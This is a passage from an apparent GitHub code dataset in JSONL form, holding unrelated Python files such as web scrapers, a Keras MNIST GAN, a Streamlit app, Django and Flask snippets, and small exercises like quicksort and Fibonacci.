digits)\n\t\t\t\t\t\t\tvalue = int(value) if value else 0\n\t\t\t\t\t\telif key in ('Cost'):\n\t\t\t\t\t\t\tmillion = 'million' in value\n\t\t\t\t\t\t\tvalue = ''.join(c for c in value if c in digits + '.')\n\t\t\t\t\t\t\tvalue = float(value) if value else 0.0\n\t\t\t\t\t\t\tif million:\n\t\t\t\t\t\t\t\tvalue *= 1000000.0\n\t\t\t\t\t\tvalues.append(value)\n\t\t\t\telif key == u'Facility Manager' and child.name == 'a':\n\t\t\t\t\tvalue = child['href']\n\t\t\t\t\tif value.startswith('mailto:'):\n\t\t\t\t\t\tvalue = (values[-1], 
value[7:])\n\t\t\t\t\t\tvalues[-1] = value\n\t\t\tcommit_info(key, values)\n\n\t\t\tfacts_heading = building_soup.find('h2', text='INTERESTING FACTS')\n\t\t\tfacts_details = facts_heading.find_next_sibling('ul')\n\t\t\tfacts = [fact.text.strip() for fact in facts_details.find_all('li')]\n\n\t\t\tcommit_info('Facts', facts)\n\n\t\t\tinfo['Building'] = building_anchor.text\n\t\t\tinfo['URL'] = building_url\n\t\t\tyield info\n\n\ndef main(args=None):\n\treturn BuildingDetailsToADSM(args=args).run()\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"kinghuang/itsm","sub_path":"itsm/building-details-to-adsm.py","file_name":"building-details-to-adsm.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7206471036","text":" ## Imports\nimport keras\nfrom keras import backend as K\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom keras.datasets import mnist\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Conv2DTranspose, Conv2D\nfrom keras.layers.core import Dropout\nfrom keras.layers import BatchNormalization\nfrom keras.layers import Activation, Input\nfrom keras.layers import LeakyReLU\nfrom sklearn.preprocessing import OneHotEncoder\nfrom keras.optimizers import Adagrad, Adam\nimport matplotlib.pyplot as plt\n\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\nK.tensorflow_backend._get_available_gpus()\n\ndef load_data():\n (X_train, y_train), (X_test, y_test) = mnist.load_data()\n X_train = (X_train.astype(np.float32)) / 255 # Set to 0-1 for each pixel value\n X_train = X_train.reshape(-1, 784)\n X_test = X_test.reshape(-1, 784)\n return X_train, y_train, X_test, y_test\n\ndef plot_loss(epoch, dLosses, gLosses):\n plt.figure(figsize=(10, 8))\n plt.plot(dLosses, label='Discriminative Loss')\n plt.plot(gLosses, label='Generative Loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig('images/mnist_gan/gan_loss_epoch_%d.png' % epoch)\n \ndef plot_images(epoch, generator, examples=100):\n dim=(10, 10)\n noise = np.random.normal(0, 1, size=[examples, 100])\n generatedImages = generator.predict(noise)\n generatedImages = generatedImages.reshape(examples, 28, 28)\n \n plt.figure(figsize=(10, 10))\n for i in range(generatedImages.shape[0]):\n plt.subplot(dim[0], dim[1], i+1)\n plt.imshow(generatedImages[i], interpolation='nearest', cmap='gray_r')\n plt.axis('off')\n \n plt.tight_layout()\n plt.savefig('images/mnist_gan/generator_image_epoch_%d.png' % epoch)\n\nadamg = Adam(lr=0.0002, beta_1=0.5)\nadamd = Adam(lr=0.0002, beta_1=0.5)\n\n\ng = Sequential()\ng.add(Dense(256, input_dim=100, kernel_initializer=keras.initializers.RandomNormal(stddev=0.02)))\n#g.add(BatchNormalization())\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(512))\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(600))\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(700))\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(800))\n#g.add(BatchNormalization())\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(1024))\n#g.add(BatchNormalization())\ng.add(LeakyReLU(alpha=0.2))\ng.add(Dense(784))\ng.compile(loss='binary_crossentropy', optimizer=adamg, metrics=['accuracy'])\n\nd = Sequential()\nd.add(Dense(1024, input_dim=784, activation=LeakyReLU(alpha=0.2), kernel_initializer=keras.initializers.RandomNormal(stddev=0.02)))\nd.add(Dropout(0.1))\nd.add(Dense(800, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(700, 
activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(600, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(512, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(256, activation=LeakyReLU(alpha=0.2)))\nd.add(Dropout(0.1))\nd.add(Dense(1, activation='sigmoid'))\nd.compile(loss='binary_crossentropy', optimizer=adamd, metrics=['accuracy'])\nd.trainable = False\n\ninputs = Input(shape=(100,))\nhidden = g(inputs)\noutput = d(hidden)\ngan = Model(inputs, output)\ngan.compile(loss='binary_crossentropy', optimizer=adamg, metrics=['accuracy'])\n\nX_train, y_train, X_test, y_test = load_data()\nX_train = X_train[np.random.randint(0, X_train.shape[0], size=25)]\nprint(y_train)\n\ndef train(epochs=1, plt_frq=1, batch_size=1):\n batchCount = int(X_train.shape[0] / batch_size)\n \n losses = {\"D\":[], \"G\":[]}\n d_loss = (0, 0)\n g_loss = (0, 0)\n for epoch in range(1, epochs + 1):\n if (epoch % 50 == 0):\n print('-'*15, 'Epoch %d' % epoch, '-'*15)\n for _ in range(batchCount):\n # Create a batch by drawing random numbers from training set\n image_batch = X_train[np.random.randint(0, X_train.shape[0], size=batch_size)]\n \n # Noise for the generator\n noise = np.random.normal(0, 1, size=(batch_size, 100))\n \n # Generate images\n generated_images = g.predict(noise)\n X = np.concatenate((image_batch, generated_images))\n y = np.zeros(2 * batch_size)\n y[:batch_size] = 0.9\n y[batch_size:] = 0.1\n \n rand = np.random.randint(0, 10)\n if (rand == 0):\n y[:batch_size] = 0.1\n y[batch_size + 1:] = 0.9\n \n # Train discriminator\n d.trainable = True\n d_loss = d.train_on_batch(X, y)\n \n # Train generator\n noise = np.random.normal(0, 1, size=(batch_size, 100))\n y2 = np.ones(batch_size)\n d.trainable = False;\n g_loss = gan.train_on_batch(noise, y2)\n \n \n # Loss on final batch of epoch\n losses[\"D\"].append(d_loss[0])\n losses[\"G\"].append(g_loss[0])\n if (epoch == 1 or epoch % 50 == 0):\n plot_loss(epoch, losses[\"D\"], losses[\"G\"])\n plot_images(epoch, g)\n \n\ntrain(epochs=20000)\n \n \n \n ","repo_name":"robertvanderaarde/CavernGAN","sub_path":"MNIST_GAN.py","file_name":"MNIST_GAN.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18805272112","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport RegresionLineal as rl\nimport RegresionPolinomial as rp\nimport ClasificadorGaussiano as cg\nimport ArbolesDecision as ad\n\n#Variables Globales\ndf = \"\"\nnombreArchivo = \"\"\nextensionArchivo = \"\"\npaso1 = False\npaso2 = False\n\nst.set_page_config(\n page_title=\"Inicio\",\n page_icon=\"👋\",\n)\n\nwith st.sidebar:\n st.write(\"# Proyecto 2\")\n st.write(\"# 201602694 👋\")\n\nst.write(\"# Paso 1: Cargar un archivo de datos\")\n\ndf = st.file_uploader(\"Seleccione un archivo\", type=('csv', 'xls', 'xlsx', 'json'))\nif df:\n nombreArchivo = df.name\n extensionArchivo = nombreArchivo.split('.')[1]\n if extensionArchivo == \"json\":\n df = pd.read_json(df)\n paso1 = True\n elif extensionArchivo == \"csv\":\n df = pd.read_csv(df)\n paso1 = True\n else:\n df = pd.read_excel(df)\n paso1 = True\n\nif st.checkbox('Mostrar Datos'):\n st.write(df)\n\n\nif paso1:\n st.write(\"# Paso 2: Seleccion de algoritmo\")\n option = st.selectbox(\n 'Seleccione el algoritmo que desea ejecutar',\n ('Regresion Lineal', 'Regresion Polinomial', 'Clasificador Gaussiano', 'Clasificador de arboles de decision', 'Redes neuronales')\n )\n 
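# Hedged alternative (sketch, not part of the original app): the if/elif\n    # dispatch in step 3 below could also be table-driven using the modules\n    # already imported at the top of this file, e.g.:\n    #   ALGORITMOS = {'Regresion Lineal': rl.RegLin,\n    #                 'Regresion Polinomial': rp.RegPol,\n    #                 'Clasificador Gaussiano': cg.ClaGau,\n    #                 'Clasificador de arboles de decision': ad.ArbDec}\n    #   ALGORITMOS.get(option, lambda df: None)(df)  # 'Redes neuronales' has no handler yet\n    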
#st.write(option)\n paso2 = True\n\nif paso2:\n st.write(\"# Paso 3: Parametrizar \" + option)\n if option == \"Regresion Lineal\":\n rl.RegLin(df)\n elif option == \"Regresion Polinomial\":\n rp.RegPol(df)\n elif option == \"Clasificador Gaussiano\":\n cg.ClaGau(df)\n elif option == \"Clasificador de arboles de decision\":\n ad.ArbDec(df)","repo_name":"javiermiron89/OLC2_Proyecto2_VJ22","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42853732331","text":"# Write a python script to print first N terms of a Fibonacci series\n\nprint()\nnum = int(input(\"Enter a number: \"))\na=0\nb=1\nc=0\ncount = 0\n\nwhile count list:\n largest_elements = []\n smallest_elements = []\n if len(data) <= 1:\n return data\n else:\n base_element = data[len(data) // 2]\n for element in data:\n if element < base_element:\n smallest_elements.append(element)\n elif element > base_element:\n largest_elements.append(element)\n return quick_sort(smallest_elements) + [base_element] + quick_sort(largest_elements)\n\n\ndata = [random.randint(1, 100) for i in range(30)]\nprint(data)\nprint(quick_sort(data))\n\n\n","repo_name":"nikolaimaseikin/algorithms","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28299253239","text":"import xlsxwriter\nfrom datetime import date\nfrom report.models import (\n Personnel,\n Bug,\n ProjectReport,\n Nsns,\n KpiOkr,\n EmergingIssues,\n TimeOff,\n NextWeekPlan\n)\n\n\ndef export_to_xlsx(time: date, io):\n bugs = Bug.objects.filter(time=time)\n project_report = ProjectReport.objects.filter(time=time)\n nsns = Nsns.objects.filter(time=time)\n kpi_okr = KpiOkr.objects.get(time=time)\n emerging_issues = EmergingIssues.objects.get(time=time)\n timeoff = TimeOff.objects.filter(time=time)\n nextweek_plan = NextWeekPlan.objects.get(time=time)\n\n \n # Nhân sự sheet\n report = xlsxwriter.Workbook(io)\n personnel_sheet = report.add_worksheet('Nhân sự')\n bold = report.add_format({'bold': True})\n date = report.add_format({'num_format': 'yy/mm/dd'})\n personnel_sheet.write('A1', 'Thời gian', bold)\n personnel_sheet.write('B1', 'Tổng CBNV/ quota', bold)\n personnel_sheet.write('C1', 'Số nhân sự in', bold)\n personnel_sheet.write('D1', 'Số nhân sự out', bold)\n personnel_sheet.write('E1', 'Tỉ lệ nghỉ việc <20% (2NS/1NĂM)', bold)\n personnel_sheet.write('F1', 'WFO-WFH', bold)\n personnel_sheet.write('G1', 'Tình hình sức khỏe', bold)\n\n personnel_fields = Personnel.objects.values_list(\n 'time__time',\n 'personnel_of_quota',\n 'personnel_in',\n 'personnel_out',\n 'resignation_rate',\n 'wfo_wfh',\n 'health_status'\n ).get(time=time)\n col = 0\n for personnel in personnel_fields:\n if col == 0:\n personnel_sheet.write(1, col, personnel, date)\n else:\n personnel_sheet.write(1, col, personnel)\n col+=1\n\n\n report.close()","repo_name":"daitech20/periodic-report-rnd","sub_path":"apps/report/api/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35927340044","text":"class university:\r\n def __init__(self):\r\n stdid=age=marks=0\r\n\r\n def validmarks(self):\r\n if(self.marks>0 and self.marks<=100):\r\n return True\r\n else:\r\n return False\r\n\r\n def 
valid_age(self):\r\n        if(self.age>=20):\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def qualification(self):\r\n        if(self.validmarks() and self.valid_age()) :\r\n            if(self.marks> 65):\r\n                return True \r\n            else:\r\n                return False\r\n        \r\n    def setter(self,sid,a,m):\r\n        self.stdid=sid\r\n        self.age=a\r\n        self.marks=m\r\n\r\n    def getter(self):\r\n        if(self.qualification()):\r\n            print(\"id\",self.stdid)\r\n            print(\"age\",self.age)\r\n            print(\"marks:\",self.marks)\r\n            print(\"given information is correct\")\r\n        else:\r\n            print(\"not valid\")\r\n\r\n\r\nn=int(input(\"enter the no of students\"))\r\nfor i in range(n):\r\n    u1=university()\r\n    stdid=int(input(\"enter the id\"))\r\n    age=int(input(\"enter the age\"))\r\n    marks=int(input(\"enter the marks\"))\r\n    u1.setter(stdid,age,marks )\r\n    u1.getter()\r\n    \r\n\r\n\r\n    \r\n","repo_name":"indracp29/pythonlab","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"23736937987","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 19 10:04:57 2019\n\n@author: brett\n\"\"\"\n# Import statements\nimport random\nimport operator\nimport matplotlib.pyplot\n\n# Create list of agents\nagents = []\nnum_of_agents = 10\nnum_of_iterations = 100\n\n# Create agents\nfor i in range (num_of_agents):\n    agents.append([random.randint(0,100),random.randint(0,100)])\n\n# Move agents\nfor j in range (num_of_iterations):\n    for i in range(num_of_agents): \n        if random.random() < 0.5:\n            agents[i][0] = (agents[i][0] + 1) % 100\n        else:\n            agents[i][0] = (agents[i][0] - 1) % 100\n     \n        \n        \n        if random.random() < 0.5:\n            agents[i][1] = (agents[i][1] + 1) % 100\n        else:\n            agents[i][1] = (agents[i][1] - 1) % 100  \n\n\n# Calculate the distance between agents\ndef distance_between(agents_row_a, agents_row_b):\n    return (((agents_row_a[0] - agents_row_b[0])**2) + ((agents_row_a[1] - agents_row_b[1])**2))**0.5\n\n# Draw and print the graph\nmatplotlib.pyplot.ylim(0, 100)\nmatplotlib.pyplot.xlim(0, 100)\n\nfor i in range (num_of_agents):\n    matplotlib.pyplot.scatter(agents[i][1],agents[i][0])\n    \nmatplotlib.pyplot.show()\n    \nfor agents_row_a in agents:\n    for agents_row_b in agents:\n        distance = distance_between(agents_row_a, agents_row_b)\n        print(distance)","repo_name":"BrettHull/GEOG5995","sub_path":"model4.py","file_name":"model4.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"38773795884","text":"from django.urls import path\n\nfrom post_app.views import PostList, CreatePost, CategoryList, GetOnePost, PostDetailUpdate, PostDetailDelete,\\\n    GePublishedPosts, GeNotPublishedPosts\n\n\nurlpatterns = [\n    path('create/post/', CreatePost.as_view()),\n\n    path('post/<int:pk>/', GetOnePost.as_view()),\n    path('post/<int:pk>/update/', PostDetailUpdate.as_view()),\n    path('post/<int:pk>/delete/', PostDetailDelete.as_view()),\n    path('posts/', PostList.as_view()),\n    path('posts/published/', GePublishedPosts.as_view()),\n    path('posts/npublished/', GeNotPublishedPosts.as_view()),\n\n    path('categories/', CategoryList.as_view()),\n\n]","repo_name":"Insaider-ZOG/django_app","sub_path":"post_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} {"seq_id":"72994668969","text":"#!/usr/bin/env python\nimport pathlib\nimport platform\n\nfrom 
Cython.Build import cythonize\nfrom setuptools import Extension, find_packages, setup\n\n\ndef read_version():\n root_path = pathlib.Path(__file__).parent\n version_path = root_path / \"supriya\" / \"_version.py\"\n with version_path.open() as file_pointer:\n file_contents = file_pointer.read()\n local_dict = {}\n exec(file_contents, None, local_dict)\n return local_dict[\"__version__\"]\n\n\nextensions = [\n Extension(\n \"supriya.utils._intervals\",\n language=\"c\",\n sources=[\"supriya/utils/_intervals.pyx\"],\n )\n]\n\nif platform.system() != \"Windows\":\n extensions.append(\n Extension(\n \"supriya.contexts.shm\",\n include_dirs=[\n \"vendor\",\n \"vendor/TLSF-2.4.6/src\",\n \"vendor/supercollider/common\",\n ],\n language=\"c++\",\n libraries=[\"rt\"] if platform.system() == \"Linux\" else [],\n sources=[\"supriya/contexts/shm.pyx\"],\n )\n )\n\nif __name__ == \"__main__\":\n setup(\n ext_modules=cythonize(extensions),\n packages=find_packages(include=[\"supriya\", \"supriya.*\"])\n + [\"supriya.assets.audio\", \"supriya.assets.audio.birds\"],\n version=read_version(),\n package_data={\"supriya\": [\"py.typed\"]},\n )\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"3928711313","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport os\r\nimport nltk\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nnltk.download('punkt')\r\nnltk.download('stopwords')\r\nimport re \r\n\r\n# Load the Excel file\r\ninput_file = 'input.xlsx'\r\ndf = pd.read_excel(input_file)\r\n#________________________________________________________________________________________________________________\r\n#\r\n# \r\n# \r\nprint(df)\r\nprint(df.info())\r\n\r\nprint(\"Number Of rows =\",df.shape[0])\r\nprint (\"Number of Columns =\",df.shape[1])\r\n \r\n# \r\n# ____________________________________________________________________________________________________________________\r\n\r\n# Create a directory to save the text files\r\noutput_dir = 'extracted_articles'\r\nos.makedirs(output_dir, exist_ok=True)\r\n\r\n# Function to extract and save articles\r\ndef extract_and_save_article(row):\r\n try:\r\n url_id = row['URL_ID']\r\n url = row['URL']\r\n\r\n # Send an HTTP GET request to the URL\r\n response = requests.get(url)\r\n\r\n if response.status_code == 200:\r\n # Parse the HTML content\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n # Extract the article title\r\n article_title = soup.title.string\r\n\r\n # Extract the article text (you may need to customize this based on the website's structure)\r\n article_text = \"\"\r\n\r\n # You should customize this part based on the HTML structure of the article content.\r\n # For example, if the article content is in a
with a specific class, you can use:\r\n article_content = soup.find('div', class_='article-content')\r\n if article_content:\r\n for paragraph in article_content.find_all('p'):\r\n article_text += paragraph.get_text() + '\\n'\r\n\r\n # Save the article title and text to a text file\r\n with open(os.path.join(output_dir, f'{url_id}.txt'), 'w', encoding='utf-8') as file:\r\n file.write(f'Title: {article_title}\\n\\n')\r\n file.write(article_text)\r\n print(f'Saved {url_id}.txt')\r\n\r\n else:\r\n print(f'Failed to fetch {url_id} ({url}) - Status Code: {response.status_code}')\r\n\r\n except Exception as e:\r\n print(f'Error processing {url_id}: {str(e)}')\r\n\r\n# Apply the function to each row in the DataFrame\r\ndf.apply(extract_and_save_article, axis=1)\r\n\r\nprint(\"Extraction and saving completed.\")\r\n\r\n\r\n\r\n#______________________________________________________________________________________________________________________________________________________________________\r\ntext_dir = \"extracted_articles\"\r\nstopwords_dir = \"StopWords\"\r\nsentment_dir = \"MasterDictionary\"\r\n\r\nstop_words = set()\r\nfor files in os.listdir(stopwords_dir):\r\n with open(os.path.join(stopwords_dir,files),'r',encoding='ISO-8859-1') as f:\r\n stop_words.update(set(f.read().splitlines()))\r\n\r\n\r\n# load all text files from the directory and store in a list(docs)\r\ndocs = []\r\nfor text_file in os.listdir(text_dir):\r\n with open(os.path.join(text_dir,text_file),'r') as f:\r\n text = f.read()\r\n#tokenize the given text file\r\n words = word_tokenize(text)\r\n# remove the stop words from the tokens\r\n filtered_text = [word for word in words if word.lower() not in stop_words]\r\n# add each filtered tokens of each file into a list\r\n docs.append(filtered_text)\r\n\r\n\r\npos=set()\r\nneg=set()\r\n\r\nfor files in os.listdir(sentment_dir):\r\n if files =='positive-words.txt':\r\n with open(os.path.join(sentment_dir,files),'r',encoding='ISO-8859-1') as f:\r\n pos.update(f.read().splitlines())\r\n else:\r\n with open(os.path.join(sentment_dir,files),'r',encoding='ISO-8859-1') as f:\r\n neg.update(f.read().splitlines())\r\n\r\n# now collect the positive and negative words from each file\r\n# calculate the scores from the positive and negative words \r\npositive_words = []\r\nNegative_words =[]\r\npositive_score = []\r\nnegative_score = []\r\npolarity_score = []\r\nsubjectivity_score = []\r\n\r\n\r\n#iterate through the list of docs\r\nfor i in range(len(docs)):\r\n positive_words.append([word for word in docs[i] if word.lower() in pos])\r\n Negative_words.append([word for word in docs[i] if word.lower() in neg])\r\n positive_score.append(len(positive_words[i]))\r\n negative_score.append(len(Negative_words[i]))\r\n polarity_score.append((positive_score[i] - negative_score[i]) / ((positive_score[i] + negative_score[i]) + 0.000001))\r\n subjectivity_score.append((positive_score[i] + negative_score[i]) / ((len(docs[i])) + 0.000001))\r\n\r\n# Average Sentence Length = the number of words / the number of sentences\r\n# Percentage of Complex words = the number of complex words / the number of words \r\n# Fog Index = 0.4 * (Average Sentence Length + Percentage of Complex words)\r\n\r\navg_sentence_length = []\r\nPercentage_of_Complex_words = []\r\nFog_Index = []\r\ncomplex_word_count = []\r\navg_syllable_word_count =[]\r\n\r\nstopwords = set(stopwords.words('english'))\r\ndef measure(file):\r\n with open(os.path.join(text_dir, file),'r') as f:\r\n text = f.read()\r\n# remove punctuations \r\n text = 
re.sub(r'[^\\w\\s.]',' ',text)\r\n# split the given text file into sentences\r\n sentences = text.split('.')\r\n# total number of sentences in a file\r\n num_sentences = len(sentences)\r\n# total words in the file\r\n words = [word for word in text.split() if word.lower() not in stopwords ]\r\n num_words = len(words)\r\n\r\n\r\n# complex words having syllable count is greater than 2\r\n# Complex words are words in the text that contain more than two syllables.\r\n complex_words = []\r\n for word in words:\r\n vowels = 'aeiou'\r\n syllable_count_word = sum( 1 for letter in word if letter.lower() in vowels)\r\n if syllable_count_word > 2:\r\n complex_words.append(word)\r\n\r\n\r\n# Syllable Count Per Word\r\n# We count the number of Syllables in each word of the text by counting the vowels present in each word.\r\n# We also handle some exceptions like words ending with \"es\",\"ed\" by not counting them as a syllable.\r\n syllable_count = 0\r\n syllable_words =[]\r\n for word in words:\r\n if word.endswith('es'):\r\n word = word[:-2]\r\n elif word.endswith('ed'):\r\n word = word[:-2]\r\n vowels = 'aeiou'\r\n syllable_count_word = sum( 1 for letter in word if letter.lower() in vowels)\r\n if syllable_count_word >= 1:\r\n syllable_words.append(word)\r\n syllable_count += syllable_count_word\r\n\r\n\r\n avg_sentence_len = num_words / num_sentences\r\n avg_syllable_word_count = syllable_count / len(syllable_words)\r\n Percent_Complex_words = len(complex_words) / num_words\r\n Fog_Index = 0.4 * (avg_sentence_len + Percent_Complex_words)\r\n\r\n return avg_sentence_len, Percent_Complex_words, Fog_Index, len(complex_words),avg_syllable_word_count\r\n \r\n\r\n\r\nfor file in os.listdir(text_dir):\r\n x,y,z,a,b = measure(file)\r\n avg_sentence_length.append(x)\r\n Percentage_of_Complex_words.append(y)\r\n Fog_Index.append(z)\r\n complex_word_count.append(a)\r\n avg_syllable_word_count.append(b)\r\n\r\n# Word Count and Average Word Length Sum of the total number of characters in each word/Total number of words\r\n# We count the total cleaned words present in the text by \r\n# removing the stop words (using stopwords class of nltk package).\r\n# removing any punctuations like ? ! , . from the word before counting.\r\n\r\ndef cleaned_words(file):\r\n with open(os.path.join(text_dir,file), 'r') as f:\r\n text = f.read()\r\n text = re.sub(r'[^\\w\\s]', '' , text)\r\n words = [word for word in text.split() if word.lower() not in stopwords]\r\n length = sum(len(word) for word in words)\r\n average_word_length = length / len(words)\r\n return len(words),average_word_length\r\n\r\nword_count = []\r\naverage_word_length = []\r\nfor file in os.listdir(text_dir):\r\n x, y = cleaned_words(file)\r\n word_count.append(x)\r\n average_word_length.append(y)\r\n\r\n\r\n# To calculate Personal Pronouns mentioned in the text, we use regex to find \r\n# the counts of the words - “I,” “we,” “my,” “ours,” and “us”. 
Special care is taken\r\n# so that the country name US is not included in the list.\r\ndef count_personal_pronouns(file):\r\n with open(os.path.join(text_dir,file), 'r') as f:\r\n text = f.read()\r\n personal_pronouns = [\"I\", \"we\", \"my\", \"ours\", \"us\"]\r\n count = 0\r\n for pronoun in personal_pronouns:\r\n count += len(re.findall(r\"\\b\" + pronoun + r\"\\b\", text)) # \\b is used to match word boundaries\r\n return count\r\n\r\npp_count = []\r\nfor file in os.listdir(text_dir):\r\n x = count_personal_pronouns(file)\r\n pp_count.append(x)\r\n\r\noutput_df = pd.read_excel('Output Data Structure.xlsx')\r\n\r\n# URL_ID 44 ,57, 144 does not exists i,e. page does not exist, throughs 404 error\r\n# so we are going to drop these rows from the table\r\noutput_df.drop([44-37,57-37,144-37], axis = 0, inplace=True)\r\n\r\nvariables = [positive_score,\r\n negative_score,\r\n polarity_score,\r\n subjectivity_score,\r\n avg_sentence_length,\r\n Percentage_of_Complex_words,\r\n Fog_Index,\r\n avg_sentence_length,\r\n complex_word_count,\r\n word_count,\r\n avg_syllable_word_count,\r\n pp_count,\r\n average_word_length]\r\n\r\noutput_df.to_csv('Output_Data.csv')\r\n\r\ndata=pd.read_csv(\"Output_Data.csv\")\r\nprint(data)\r\n\r\nprint(data.info)\r\nprint(\"Number Of Rows =\",data.shape[0])\r\nprint(\"Number Of Columns= \",data.shape[1])","repo_name":"rummana269/BlackCoffer","sub_path":"Task.py","file_name":"Task.py","file_ext":"py","file_size_in_byte":9474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71644568807","text":"from FlaskMagazine.database import init_db\nfrom FlaskMagazine.database import db_session\nfrom FlaskMagazine.models import Product, Feature\n\ninit_db()\n\np = Product('Смартфон Xiaomi',1)\np1 = Product('Смартфон Sumsung',2)\np2 = Product('Смартфон Nokia',3)\n\ndb_session.add(p)\ndb_session.add(p1)\ndb_session.add(p2)\ndb_session.commit()\n\nfor i in range(1,4):\n f = Feature('Тип', 'Смартфон', i)\n f1 = Feature('Операционная система', 'Android', i)\n f2 = Feature('Тип корпуса', 'классический', i)\n\n db_session.add(f)\n db_session.add(f1)\n db_session.add(f2)\n db_session.commit()\n","repo_name":"franky4p/MyFlaskMagaziine","sub_path":"FlaskMagazine/Utils/create_base.py","file_name":"create_base.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21687182131","text":"from twisted.internet import reactor, defer\nfrom pollapli.core.logic.components.environments.environment_manager import EnvironmentManager\nfrom pollapli.core.logic.components.drivers.driver import DriverManager\n\nclass LogicLayer(object):\n def __init__(self,persistenceLayer=None):\n self._persistenceLayer = persistenceLayer\n self._environmentManager = EnvironmentManager(self._persistenceLayer)\n #self._driverManager = DriverManager()\n \n @defer.inlineCallbacks\n def setup(self):\n yield self._environmentManager.setup()\n \n def __getattr__(self, attr_name):\n if hasattr(self._environmentManager, attr_name):\n return getattr(self._environmentManager, attr_name) \n else:\n raise AttributeError(attr_name)\n \n @defer.inlineCallbacks\n def add_task(self,environmentId,*args,**kwargs):\n env = self._environmentManager.get_environment(environmentId, *args, **kwargs)\n task = yield env.add_task(*args,**kwargs)\n defer.returnValue(task)\n \n @defer.inlineCallbacks\n def get_tasks(self, environmentId = None, *args, **kwargs):\n env = 
self._environmentManager.get_environment(environmentId, *args, **kwargs)\n tasks = yield env.get_tasks(*args, **kwargs)\n defer.returnValue(tasks)\n \n @defer.inlineCallbacks \n def add_device(self,environmentId,*args,**kwargs):\n env = self._environmentManager.get_environment(environmentId)\n device = yield env.add_device(*args,**kwargs)\n defer.returnValue(device)\n \n @defer.inlineCallbacks\n def get_devices(self, environmentId = None, *args, **kwargs):\n env = self._environmentManager.get_environment(environmentId, *args, **kwargs)\n devices = yield env.get_devices(*args, **kwargs)\n defer.returnValue(devices)","repo_name":"kaosat-dev/Pollapli","sub_path":"pollapli/core/logic/logic_layer.py","file_name":"logic_layer.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23702855689","text":"import time\n\nstart = time.time()\n\n\n# Test for pentagonal numbers from Wikipedia\ndef pentagonal(n):\n if (((24 * n + 1) ** 0.5) + 1) % 6 == 0:\n return True\n return False\n\n\n# Test for hexagonal numbers from Wikipedia\ndef hexagonal(n):\n if (((8 * n + 1) ** 0.5) + 1) % 4 == 0:\n return True\n return False\n\n\nn = 286\n\nwhile True:\n triangle_number = int((n * (n + 1)) / 2)\n if not pentagonal(triangle_number):\n n += 1\n continue\n if not hexagonal(triangle_number):\n n += 1\n continue\n print(triangle_number)\n break\n\nend = time.time()\n\n# Executes in 0.0350 seconds\nprint(end - start)\n","repo_name":"Cikguseven/Project-Euler","sub_path":"Solutions/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20678493962","text":"from datetime import datetime\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom actstream.managers import ActionManager, stream\n\n\nclass MyActionManager(ActionManager):\n\n @stream\n def testfoo(self, object, time=None):\n if time is None:\n time = datetime.now()\n return object.actor_actions.filter(timestamp__lte = time)\n\n @stream\n def testbar(self, verb):\n return 